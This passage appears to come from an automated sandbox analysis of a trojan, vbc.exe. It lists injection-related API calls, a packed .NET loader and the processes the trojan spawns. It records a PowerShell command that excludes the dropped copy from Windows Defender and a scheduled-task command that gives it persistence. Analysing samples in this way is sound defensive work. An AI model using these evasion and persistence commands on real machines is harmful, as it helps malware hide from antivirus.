Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FF900	8_2_017FF900
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C1D55	8_2_018C1D55
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180B090	8_2_0180B090
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1002	8_2_018B1002
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182EBB0	8_2_0182EBB0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01816E30	8_2_01816E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5C9A5	20_2_02B5C9A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B42FB0	20_2_02B42FB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B48C80	20_2_02B48C80
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B48C7B	20_2_02B48C7B
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B42D90	20_2_02B42D90
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B42D87	20_2_02B42D87

Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_004185E0 NtCreateFile,	8_2_004185E0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00418690 NtReadFile,	8_2_00418690
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00418710 NtClose,	8_2_00418710
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_004187C0 NtAllocateVirtualMemory,	8_2_004187C0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_004187C2 NtAllocateVirtualMemory,	8_2_004187C2
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018399A0 NtCreateSection,LdrInitializeThunk,	8_2_018399A0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018395D0 NtClose,LdrInitializeThunk,	8_2_018395D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01839910
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839540 NtReadFile,LdrInitializeThunk,	8_2_01839540
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_018398F0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839840 NtDelayExecution,LdrInitializeThunk,	8_2_01839840
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01839860
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839780 NtMapViewOfSection,LdrInitializeThunk,	8_2_01839780
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_018397A0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839FE0 NtCreateMutant,LdrInitializeThunk,	8_2_01839FE0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839710 NtQueryInformationToken,LdrInitializeThunk,	8_2_01839710
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_018396E0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_01839A00
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839A20 NtResumeThread,LdrInitializeThunk,	8_2_01839A20
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839A50 NtCreateFile,LdrInitializeThunk,	8_2_01839A50
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01839660
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018399D0 NtCreateProcessEx,	8_2_018399D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018395F0 NtQueryInformationFile,	8_2_018395F0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839520 NtWaitForSingleObject,	8_2_01839520
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183AD30 NtSetContextThread,	8_2_0183AD30
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839950 NtQueueApcThread,	8_2_01839950
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839560 NtWriteFile,	8_2_01839560
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018398A0 NtWriteVirtualMemory,	8_2_018398A0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839820 NtEnumerateKey,	8_2_01839820
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183B040 NtSuspendThread,	8_2_0183B040
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183A3B0 NtGetContextThread,	8_2_0183A3B0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839B00 NtSetValueKey,	8_2_01839B00
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183A710 NtOpenProcessToken,	8_2_0183A710
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839730 NtQueryVirtualMemory,	8_2_01839730
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839760 NtOpenProcess,	8_2_01839760
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839770 NtSetInformationFile,	8_2_01839770
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183A770 NtOpenThread,	8_2_0183A770
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839A80 NtOpenDirectoryObject,	8_2_01839A80
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018396D0 NtCreateKey,	8_2_018396D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839610 NtEnumerateValueKey,	8_2_01839610
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839A10 NtQuerySection,	8_2_01839A10
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839650 NtQueryValueKey,	8_2_01839650
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01839670 NtQueryInformationProcess,	8_2_01839670
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B58690 NtReadFile,	20_2_02B58690
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B587C0 NtAllocateVirtualMemory,	20_2_02B587C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B58710 NtClose,	20_2_02B58710
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B585E0 NtCreateFile,	20_2_02B585E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B587C2 NtAllocateVirtualMemory,	20_2_02B587C2

Source: vbc.exe	Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs vbc.exe
Source: vbc.exe, 00000000.00000002.267729856.0000000005CB0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll@ vs vbc.exe
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameHResult.dll6 vs vbc.exe
Source: vbc.exe	Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000008.00000002.344710455.0000000001A7F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs vbc.exe
Source: vbc.exe	Binary or memory string: OriginalFilenameICollecti.exeB vs vbc.exe

Source: vbc.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: uZlkYhlkeLeaKC.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vbc.exe

File read: C:\Users\user\Desktop\vbc.exe

Jump to behavior

Source: vbc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe	Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe

Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\tmpAA68.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/8@14/6

Source: C:\Users\user\Desktop\vbc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: vbc.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: vbc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: vbc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source:	Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F7A49 push es; ret	0_2_006F7A74
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F72F5 push cs; retf	0_2_006F7302
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F8699 push es; ret	0_2_006F879A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F7151 push cs; retf	0_2_006F72F4
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F87AD push es; ret	0_2_006F87B8
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_006F879B push es; ret	0_2_006F87AC
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FC95E5 push eax; retf	0_2_04FC95E6
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041B832 push eax; ret	8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041B83B push eax; ret	8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041B89C push eax; ret	8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00406907 push 00000060h; retf	8_2_0040691C
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041A11B push ecx; ret	8_2_0041A11C
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041A3BA pushfd ; ret	8_2_0041A3BB
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_004154EE pushad ; retf	8_2_004154F0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00419E43 push 0000007Eh; iretd	8_2_00419E45
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0040EFC6 push cs; ret	8_2_0040EFCC
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041B7E5 push eax; ret	8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D17151 push cs; retf	8_2_00D172F4
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D172F5 push cs; retf	8_2_00D17302
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D17A49 push es; ret	8_2_00D17A74
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D18699 push es; ret	8_2_00D1879A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D1879B push es; ret	8_2_00D187AC
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00D187AD push es; ret	8_2_00D187B8
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0184D0D1 push ecx; ret	8_2_0184D0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5A3BA pushfd ; ret	20_2_02B5A3BB
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5B89C push eax; ret	20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5B832 push eax; ret	20_2_02B5B838
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5B83B push eax; ret	20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B5A11B push ecx; ret	20_2_02B5A11C
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B46907 push 00000060h; retf	20_2_02B4691C
Source: C:\Windows\SysWOW64\help.exe	Code function: 20_2_02B59E43 push 0000007Eh; iretd	20_2_02B59E45

Source: initial sample	Static PE information: section name: .text entropy: 7.9203967863
Source: initial sample	Static PE information: section name: .text entropy: 7.9203967863

Source: vbc.exe, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: vbc.exe, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: vbc.exe, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: vbc.exe, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: vbc.exe, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: vbc.exe, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: vbc.exe, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: uZlkYhlkeLeaKC.exe.0.dr, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: uZlkYhlkeLeaKC.exe.0.dr, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: uZlkYhlkeLeaKC.exe.0.dr, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: uZlkYhlkeLeaKC.exe.0.dr, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: uZlkYhlkeLeaKC.exe.0.dr, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.2.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.2.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.2.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.2.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 0.2.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.2.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.2.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.0.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
